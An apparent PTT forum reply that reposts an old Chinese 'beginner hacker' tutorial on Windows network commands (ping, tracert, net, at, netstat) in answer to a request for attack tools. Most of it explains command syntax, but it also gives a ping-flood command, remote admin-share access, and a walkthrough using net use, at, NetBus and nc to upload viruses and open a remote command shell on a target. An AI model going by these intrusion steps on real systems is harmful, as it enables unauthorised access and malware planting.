找不到軟體, 找到基本通訊協定的概念, 阿傑~~ 自己寫一個吧~~~ 不然如果趙佬看到有興趣的話再請他幫忙~ 哈 ============================== 初級駭客安全技術命令詳解 要想做一名真正的駭客，僅僅依靠網路流傳的黑軟進行掃描或者攻擊是沒有用的，這樣永 遠不可能成長為一名真正的駭客，大家需要注意的是，平時還得注意積累，這次筆者就簡 單的 為大家介紹一些系統命令，對於初學的菜鳥絕對是必修課之一。 　　對了，再說兩句廢話吧，“工欲善其事，必先利其器”－－當然不是讓你再滿世界去 找新的駭客軟體啦（其實我不反對使用這些軟體，相反我很喜歡用它們，但是必須是在知 其所以然的情況下使用，才有可能對自身的電腦水平有所幫助），要進行入侵工作的話， 至少（我認為）得裝上NT作業系統，以它作為入侵平台，因為NT本身對網路的支援可以說 比WIN9X來得更強大得多……當然，如果想對UNIX系統動點小手術（網路中的UNIX可始終 還是主流呀）而又沒錢裝UNIX的話，LINUX也極佳的選擇（特別是現在國內至少有七八種 中文LINUX版本－－想當年要給REDHAT配上中文支援是何等麻煩……），至少你可以借此 了解UNIX系統的基本操作以及文件存放位置、系統配置、編譯器、各種動作之後的記錄等 等…… 　　然後還得再學點程式設計語言，至少C與UNIX下的SHELL程式設計得會一點，能看懂人 家寫的利用各種漏洞的程式，能對它進行修改，偶爾還能寫幾個小程式放到網上讓大夥兒 樂樂，這樣玩起來才可能有成就感（其實我自己還不太行，但這多少是個目標） 　　好了，廢話少說，先講講一些M$系統裏自帶的相關網路程式的使用吧。 在M$的作業系統中，與網路安全較有關係的幾個命令/程式是： ping\winipcfg\tracert\net\at\netstat,且待我慢慢道來: 1. ping：這是TCP/IP協議中最有用的命令之一 　　它給另一個系統發送一系列的數據包，該系統本身又發回一個響應，這條公用程式對 查找遠端主機很有用，它返回的結果表示是否能到達主機，宿主機發送一個返回數據包需 要多長時間。 Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] destination-list Options: -t Ping the specifed host until interrupted.（除非人為中止，否則一直ping下去） -a Resolve addresses to hostnames.（把IP轉為主機名） -n count Number of echo requests to send.（響應請求的數量） -l size Send buffer size.（封包的大小） -f Set Don't Fragment flag in packet.（資訊包中無碎片） -i TTL Time To Live.（時間） -v TOS Type Of Service.（服務類型） -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list.（較嚴格的……唉，怎麼譯好… …算了，放著吧） -w timeout Timeout in milliseconds to wait for each reply.(timeout的時間） 　　比如大家可能都知道的一個命令 # ping -f -s 65000 ***.***.***.***或者前階段 大家所謂ping死霉國佬時所用的命令（當然這樣隻會造成我方自己的網路阻塞）。 　　其實這個命令主要是用來看對方應答的速度，如果怎麼ping 得到的結果都是 request time out。那恐怕你根本就不用你去找這台主機了，它不在你的射程之內。 　　2. winipcfg: 　　這是用來看自己IP位址的小工具，win98自帶，NT裏則網路顯示器裏就能看到IP了， 還有個小公用程式叫……好象是叫IPCONFIG吧，沒怎麼用，都快忘了……這種東東網上其 實相當之多，但既然“自帶”，又何須外求，何況網上下載的駭客的東東裏有沒有特洛伊 猶未可知，再說了，如果你不是在自己的“愛姬”上運行，豈不是就沒法幹活？－－哈， 不好意思，跑題了，但－－接著跑兩句：可以把一些常用的、經典的工具上傳到網上，當 作一個備份，什麼時候在網吧、某家公司要幹活的話，直接下載就是一個完整無缺的工具 包了。 這個東東相當簡單，直接在DOS下鍵入命令就是了，沒有什麼參數。 　　3. tracert:是驗證通往遠端主機路徑的公用程式 　　用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name 　　參數: 　　-d Do not resolve addresses to hostnames.（不將IP轉為主機名） 　　 -h maximum_hops Maximum number of hops to search for target.（最大跟蹤數 量） 　　 -j host-list Loose source route along host-list. 　　 -w timeout Wait timeout milliseconds for each reply.（time out 的時間） 　　最簡單的用法就是 tracert hostname 其中hostname是電腦名或你想跟蹤其路徑的電 腦的IP地址。TRACERT將返回數據包借以到達最終目的地的各種IP地址，你知道該怎麼利 用它嗎？ 　　我略為解釋一下吧：跟蹤通往210.142.192.130的路由，最大30: 　　 第一行：*&^%&* 我就是從這裡出去的（呵，真不想說^&^) 　　 第四行：是不是快要出國了呢？ 　　 第九行：呀！這是日本鬼子的地盤…… 　　4. net:這可是個非常棒的東西，如果不會用的話，趕緊睜大眼睛噢 初級駭客安全技術命令詳解（2） 　　這個命令的語法是: 可用的命令包括： NET ACCOUNTS NET HELP NET SHARE NET COMPUTER NET HELPMSG NET START NET CONFIG NET LOCALGROUP NET STATISTICS NET CONFIG SERVER NET NAME NET STOP NET CONFIG WORKSTATION NET PAUSE NET TIME NET CONTINUE NET PRINT NET USE NET FILE NET SEND NET USER NET GROUP NET SESSION NET VIEW NET HELP SERVICES 列出用戶可以啟動的網路服務。 NET HELP SYNTAX 解釋如何閱讀 NET HELP 語法行。 NET HELP command | MORE 用於逐屏顯示幫助。 　　我可就不逐樣解釋了－－這樣會把我的手指累壞，就說說常用的兩個命令吧 　　a.net view 　　這個命令的語法是: 　　 NET VIEW [\\computername | /DOMAIN[:domainname]] 　　 NET VIEW /NETWORK:NW [\\computername] 　　NET VIEW 用於顯示一個電腦上共享資源的清單。當不帶選項使用本命令時，它就會 顯示目前域或網路上的電腦上的清單。 　　\\computername 指用戶希望瀏覽其共享資源的電腦。 　　/DOMAIN:domainname 指定用戶希望瀏覽有效的電腦所在的域。如果省略了網域名稱 ，就會顯示區域網路絡上的所有域。 　　/NETWORK:NW 顯示 NetWare 網路上所有可用的伺服器。如果指定了一個電腦名，就 會顯示NetWare 網路中那個電腦上的可用資源。 至於舉例嘛，比如你知道一個遠端電腦***.***.**.***上有開資源共享，那麼運行net view \\***.***.**.*** 就可以了 　　b.net use 　　這個命令的語法是:NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]] [/USER:[domainname\]username] [[/DELETE] | [/PERSISTENT:{YES | NO}]] NET USE [devicename | *] [password | *]] [/HOME] NET USE [/PERSISTENT:{YES | NO}] 　　NET USE 用於將電腦與共享的資源相連接，或者切斷電腦與共享資源的連接。當不帶 選項使用本命令時，它會列出電腦的連接。 　　devicename 指定一個名字以便與資源相連接，或者指定要切斷的設備。有兩種類型 的設備名：磁碟驅動器 (D: 至 Z 和印表機 (LPT1: 至 LPT3。輸入一個星號來代替一個 指定的設備名可以分配下一個可用設備名。 　　\\computername 指控制共享資源的電腦的名字。如果電腦名中包含有空字元，就要 將雙反斜線 (\\) 和電腦名一起用引號 (" "括起來。電腦名可以有1 到15 個 字元。 　　\sharename 指共享資源的網路名字。 　　\volume 指定一個伺服器上的 NetWare 卷。用戶必須裝設 Netware 的用戶服務 (Windows NT 工作站) 或者 Netware 的通訊閘服務 (Windows NT 伺服器) 並使之與 NetWare 伺服器相連。 　　password 指訪問共享資源所需要的密碼。 　　* 進行密碼提示。當在密碼提示符下輸入密碼時，密碼是不會顯示的。 　　/USER 指定連接時的一個不同的用戶名。 　　domainname 指定另外一個域。如果缺省域，就會使用目前登錄的域。 　　username 指定登錄的用戶名。 　　/HOME 將用戶與他們的宿主目錄相連。 　　/DELETE 取消一個網路連接，並且從永久連接清單中刪除該連接。 　　/PERSISTENT 控制對永久網路連接的使用。其缺省值是最近使用的設定。 　　YES 在連接產生時保存它們，並在下次登錄時恢復它們。 　　NO 不保存正在產生的連接或後續的連接；現有的連接將在下次登錄時被恢復。可以 使用 /DELETE 選項開關來刪除永久連接。 　PS:前兩天在綠色兵團的貼子裏見到一位仁兄的話，與這個命令有異曲共工之妙，也說 明一個大概： 　　在瀏覽器中輸入 file:///\\***.***.**.***\c$ 　　則網上共享的C盤內容就會顯示出來了，就倣佛用瀏覽器上FTP站點看到的一樣。各位 不妨試試，還可試試舉一反三…… 　　5.at： 排定在特定的日期和時間運行某些命令和程式。 　　運行 AT 命令之前必須先啟動 Schedule 服務。瞧，現炒就得現賣，剛學了net命令 ，但這個start命令我可沒詳述，自已看看幫助文件，摸索一下各種命令的用法吧。 　　C:\>net start schedule 　　 Schedule 正在啟動服務..... 　　 Schedulw 服務啟動成功。 　　AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]] 　　 AT [\\computername] time [/INTERACTIVE] 　　 [ /EVERY:date[,...] | /NEXT:date[,...]] "command" 　　\\computername 指定遠端電腦。如果省略這個參數命令會被排定在本機上運行。 　　id 指定給排定進度命令的識別號。 　　/delete 刪除某個已排定進度的命令。如果省略標識，電腦上所有已排定進度的命令 都會被刪除。 　　/yes 用於刪除所有作業，且不想在運行刪除時顯示確認資訊 。 　　time 指定命令運行的時間。 　　 interactive 允許作業在運行時，與用戶透過桌面互動。 　　/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令。 　　 如果省略日期，則默認為在每月的本日運行。 　　/next:date[,...] 指定在下一個指定日期 (如，下周三)，運行命令。 　　 如果省略日期，則默認為在每月的本日運行。 　　"command" 準備運行的 Windows NT 命令或批處理文件。 　　知道了如何使用AT，再來看看如何在遠端NT上運行ntsrv.exe： 　　1 利用管理員登陸到目的伺服器，方法為： net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser" 　　 2 利用ntsrv.exe啟動遠端: netsvc \\x.x.x.x schedule /start 　　 3 利用AT.EXE在遠端伺服器設定程式定時運行，當然最快運行最理想，所以，你可 以用letmein.exe得到伺服器的時間，然後： 　　at \\x.x.x.x 00:00 ntsrv.exe /port:64321 　　其中00:00要改為用letmein.exe得回來的具體時間+一點容量，等一會後，再在本地 啟動netbus.exe，鍵入目的伺服器得ip地址或hostname，連接！比如第一種方法，你想要 在目的伺服器運行諸如病毒之類的東東，可以利用netbus得上傳功能，將各種“大補丸” 上傳至目的伺服器，再用netbus的"Start program"，鍵入完整路徑，就ok了！第二種方 法是利用netbus的“App redirect”功能，啟動遠端telnet服務，如下：在netbus中擊“ App redirect”，鍵入"C:\>winnt\system32\cmd.exe"，Port為：4321，服務就啟動了， 然後在本地運行：nc x.x.x.x 4321，出現dos啟動的畫面就表示連接成功： Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\> 注：這裡有一小段是抄KILLUSA的文章－－別找我要稿費啊^&^ 　　4.netstat 這是一個觀察網路連接狀態的實用工具。 　　它能檢驗IP的目前連接狀態，在斷定你的基本級通信正在進行後，就要驗證系統上的 服務。這個服務包括檢查正在收聽輸入的通信量和/或驗證你正在創建一個與遠端站點的 會話，它可以很輕鬆地做到這一點。網上也可以看到很多如X-netstat之類的工具，是WIN 介面的，更加直觀而已，並沒有多什麼功能，這個命令的具體用法如下： Displays protocol statistics and current TCP/IP network connections.（顯示協議 與目前網路連接） NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] -a Displays all connections and listening ports.（顯示所有連接和監聽連接埠） -e Displays Ethernet statistics. This may be combined with the -s option.（顯示以太連接，可以與-s連用） -n Displays addresses and port numbers in numerical form.（顯示地址和連接埠） -p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. -r Displays the routing table. -s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.（interval是設定一個刷新時間，在間隔時間內暫停 ，按CTRL+C停止……） 　　這是我在本機未連接網路時運行的，第一列為協議，第二列為本地地址，第三列是與 你進行連接的主機或用戶的IP位址（IP後冒號之後的數字是連接埠號），最後一列是狀態 。這個命令以-n和-a的參數我較常使用，讀者可以參考使用。（全文完） ※ 引述《alexjay (AlexJay)》之銘言： : 徵求攻擊程式的名稱或檔案 : 工作需要用一些攻擊程式來測試公司的產品 : 有人知道一些駭客使用的攻擊程式嗎? : 像是HGOD可發出DDOS攻擊 : 還有沒有其他的攻擊程式呢? : 或是一些入侵手法啥的都可以 有的話請告訴我 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 123.110.228.14